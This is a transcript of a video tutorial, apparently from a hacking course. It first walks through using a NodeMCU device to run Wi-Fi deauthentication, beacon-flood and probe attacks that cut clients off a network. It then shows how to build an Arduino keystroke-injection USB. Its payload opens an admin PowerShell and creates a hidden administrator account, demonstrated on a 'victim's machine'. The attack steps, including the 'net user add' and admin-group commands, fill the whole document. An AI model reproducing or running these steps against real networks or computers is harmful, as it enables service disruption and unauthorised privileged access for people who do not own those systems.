192.168.4.1, and you'll be presented with the application that we have just populated on the Node MCU. Couple of things that we need to know here. The first tab is used to scan all the neighboring Wi-Fi connections, so just press on scan apps. Once you do that, you will notice that the blue LED light will turn on. It will take a couple of seconds and then it will turn off. Once it turns off, just press on the reload here. You will get all the neighboring Wi-Fi networks. After that, you select one access point. I'm doing this on my connection here, MAJO. Then select or press on the scan stations button. Again, the blue LED on the chip will turn on. It will take 15 seconds to scan the stations that are connected to this access point. During the scanning of the stations, you will be disconnected from the PON network. So after the scanning is complete, make sure you're connected again to the PON network. Press on the reload button here and go down to the stations section. Press on select all, so we're selecting all the stations that are associated with this access point. Then go to the attacks menu. You'll be seeing three types of attacks: the authentication attack, beacon attack, and the probe. As for the deauthentication attack, which is the main application and the tutorial here, we have selected 6 targets. So once we start here, pressing the start, it will start sending the authentication frames to all these 6 targets. So none of these 6 targets will be able to connect. This chip runs on 2.5 gigahertz. All the clients running on 2.5 gigahertz will be disconnected, and all the clients running, for example, on the 5 gigahertz, they will not be affected by this attack. So now I will show the effect of this attack on a client that is connected to the MAJO network. Okay guys, so I'm here on another laptop. I'm connected to this access point here, MAJO, and I'm using Google, and there is an internet connection and it's working fine. Okay, now I will initiate the authentication attack from the Node MCU, and just notice what will happen in a while. Just wait for a couple of seconds and you will see that there is a yellow mark here which obviously says that there is no internet connectivity. So let's check it out here. Just do this refresh. It says there is no internet access. So again, it's identifying the network connected. So let's hit refresh again. It's connected, but actually the deauthentication packet disconnected this client again from the access point. So this can go on forever depending on your configuration. Going back again to the other types of attack, we have the beacon and the probe. If you go down below, you'll be able to see the description. The probe attack is actually just to mimic clients sending probe requests to nearby SSIDs, which are like fake probe requests. This is actually done just to confuse some Wi-Fi trackers. The other attack we'll talk about here is the beacon attack. So actually it creates false SSIDs. If you go here to the SSID menu, you have 2 options to create false SSIDs. You can either select an SSID name here and just select the number of access points that you'll be creating. Press on add. If you go below here, you'll be able to see all of these random SSIDs. Now go to the attacks menu, press start next to the beacon. Then notice here on the network, you'll be able to see a lot of fake access points. Again, you can go to the SSIDs. You can enable the random mode, which actually creates a list of just random access points with these naming conventions, as you can see. Again, go to the attacks menu and start the beacon attack again. Let's check now, and you will see a list of these random access points available for us to connect to. RubberDucky is a keystroke injection tool disguised as a generic USB drive, as described here on hackshop.com website. It comes with $45 in price. You have to add to that the shipping and the clearance cost. Thus it becomes really expensive. However, RubberDucky has a simple scripting language that anyone can use to simply craft payloads that can perform myriad of actions, such as changing system settings, installing backdoors, stealing data, opening remote shells, and etc. You can attack any operating system that supports USB keyboard. You just put your payload on this USB, and once it is plugged in any computer, it will run automatically. We can achieve the same result by building a similar USB drive in a much more cheaper way using Arduino. I'm not an Arduino expert, but I have tried this and it really works like magic. The Arduino boards are available commercially in pre-assembled form or do-it-yourself kit. You can easily go to aliexpress.com and just type in Arduino Micro here. Just see the results you'll be getting. Some of the chips are really small and have a built-in USB connector, which makes it easier for us to achieve a result similar to rubber ducky. Some of you might think, how can this Arduino be used to hack something? Well, since it supports keyboard emulation, we can build, it's called sketches on the Arduino IDE, which is a file actually that has .ino extension. So we can build these sketches, and which actually contains keyboard instructions to type commands and execute, just like popular USB rubber ducky does. So we just upload our payload there, and once the USB is inserted, it will automatically run. So let's show you how to start building that. To prepare, you need to install the Arduino IDE. So if you're using Kali, you can simply go here to the console and write apt-get install Arduino. You will get the IDE installed, and if you want to initiate or open the IDE, just write Arduino here and it will start loading the IDE. So that's the Arduino IDE, and this file here, wherever you write, it's called a sketch. For the purposes of simplicity, I'll just use that on my Windows machine. So I've downloaded the Arduino IDE from arduino.cc website. Just let me open it here. So let me clear this out. So you need to install the IDE. You also need to buy one of these from AliExpress. I just bought that, the Pro Micro. It's very cheap. It comes at $3 and it takes like 1 week to reach you. So just buy that. It comes with a small USB interface. You also need the small USB to USB cable with that. So that's it. And just you have to buy mini USB cable. Now you need to go to this website here. It's on a page on GitHub by Hack5Darren. It has lots of rubber ducky scripts. So let's begin with the first one, which is the simplest one, Hello World. If you click on that, you'll be able to see the simple scripting language that rubber ducky supports. But Arduino does not support the scripting language of Ducky. So we have to convert this to Arduino language. So just copy that and go to a website to convert the Ducky script into Arduino language. It's nurl.github.io/Duckwino. So just have to paste your code here and press on compile and just press on copy. After that, open the Arduino IDE and just press on paste. Just to give you a quick overview on how this code works. So this is a sketch file. It's just a regular file with INO extension. It has two main procedures: the setup procedure, which is here, and the loop procedure. It also includes some of the important files such as keyboard.h header file. The setup procedure will only be executed once when Arduino is powered on and initialized, while the loop procedure will be executed repeatedly over and over again until Arduino is powered off. Now I will plug my Arduino chip. I'll just connect it to my mini USB cable here and plug it into my laptop. So I have Arduino Leonardo on port COM6. If you go here to tools and select the board, it's Arduino Leonardo, and the port, it's on COM6. So this is actually the Hello World example that we have. So I'll just compile it or verify it by pressing this button here, or you can press sketch verify compile. So let's wait for that. It's giving compiling sketch here, and you can see the progress bar on the bottom right. And now compiling is done successfully. Now we need to upload our script or our hello world example to the Arduino device. So just press the button here, upload, and now you will see that the file is uploaded successfully, and once it's uploaded successfully it will automatically run. So as you can see here, it just opened Notepad and wrote this hello world here. So let me close this here, just let me remove this from the sketch file. I'll now open Notepad and re-plug the Arduino device so that you will see what's happening here. So I'll plug it again. It will take some time and it will just open Notepad, write Notepad and write hello world. So this is a simple example of how can you load this USB device to mimic a payload. Now let's get real by going again here to the website, again github.com, and going to another Arduino Docker script. I'll just put the links with the video. So this actually payload, it adds user as an admin to the computer once you plug the USB into that. So let me copy the file here. This is Arduino script. You don't need to convert from Docker script to Arduino because this is already converted. So we go again here to our sketch and let me remove all of that. Paste the new code here and just make sure that the board is Leonardo and the port is selected on COM6. If you scan this code, you'll see that in this setup, so you will start keyboard and mouse, then start the payload by pressing Windows X. This is the left key, which is the Windows key plus X. Then you'll type A to open the PowerShell command. After that, you will write key left Alt, then Y. And now this is for selecting yes, clicking yes. Now in the PowerShell command, you will issue this line here, net user add Arduino. So let me add my user here, for example, red Python, and this is a complex password. After that, after you've created this user, you will add this user to the administrators group. Again, let me update that here. And that's it. You will just add user to the admin group with just a second. So let me verify that here, compile it again. It just compiled with no errors, and I will upload that here. After you upload that, after the upload is done successfully, you have to remove the USB as fast as possible in order to avoid that being run. So done uploading, just remove that, press no here. I just removed that. So my payload is now loaded onto my Arduino device. Okay, so suppose that I go now to the victim's machine and I will plug in my USB. So see what happens now. So once you plug in USB, see the sequence taking place, and it's just a matter of seconds for our user to be created and added to the admin. In order to verify that, I'll go to the user console here. I'll open the users and see that red Python user is created. Just double check in the groups, and here you go, the red Python is in the admin group.